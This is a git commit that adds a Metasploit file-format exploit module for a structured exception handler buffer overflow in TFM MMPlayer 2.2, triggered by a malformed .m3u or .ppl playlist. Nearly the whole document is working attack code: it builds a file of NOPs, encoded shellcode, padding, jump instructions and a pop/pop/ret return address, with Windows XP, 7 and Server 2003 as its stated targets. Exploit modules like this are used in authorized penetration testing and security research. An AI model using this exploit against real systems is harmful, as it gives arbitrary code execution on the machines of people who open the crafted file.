Added TFM MMPlayer (m3u/ppl File) Buffer Overflow module

unstable
bcoles 2012-06-13 13:50:12 +09:30
parent 3bfa261e90
commit 9756f87517
1 changed files with 86 additions and 0 deletions

View File

@ -0,0 +1,86 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in MMPlayer 2.2
The vulnerability is triggered when opening a malformed M3U/PPL file
that contains an overly long string. This results in overwriting a
structured exception handler record.
},
'License' => MSF_LICENSE,
'Author' =>
[
'RjRjh Hack3r', # Original discovery and exploit
'Brendan Coles <bcoles[at]gmail[dot]com>', # msf exploit
],
'References' =>
[
[ 'EDB', '18656' ], # .m3u
[ 'EDB', '18657' ], # .ppl
],
'DefaultOptions' =>
{
'ExitFunction' => 'seh',
'InitialAutoRunScript' => 'migrate -f',
},
'Platform' => 'win',
'Targets' =>
[
# Tested on:
# Windows XP Pro SP3 - English
# Windows 7 Home Basic SP0 - English
# Windows Server 2003 Enterprise SP2 - English
[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
],
'Payload' =>
{
'Size' => 4000,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => false,
},
'Privileged' => false,
'DisclosureDate' => '23 Mar 2012',
'DefaultTarget' => 0
))
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.ppl']),], self.class)
end
def exploit
nops = make_nops(10)
sc = payload.encoded
offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length)
jmp = Rex::Arch::X86.jmp(-4108) # near jump 4103 bytes
nseh = Rex::Arch::X86.jmp_short(-7) # jmp back 7 bytes
nseh << Rex::Text.rand_text_alphanumeric(2)
seh = [target.ret].pack('V')
sploit = nops
sploit << sc
sploit << offset
sploit << jmp
sploit << nseh
sploit << seh
# write file
file_create(sploit)
end
end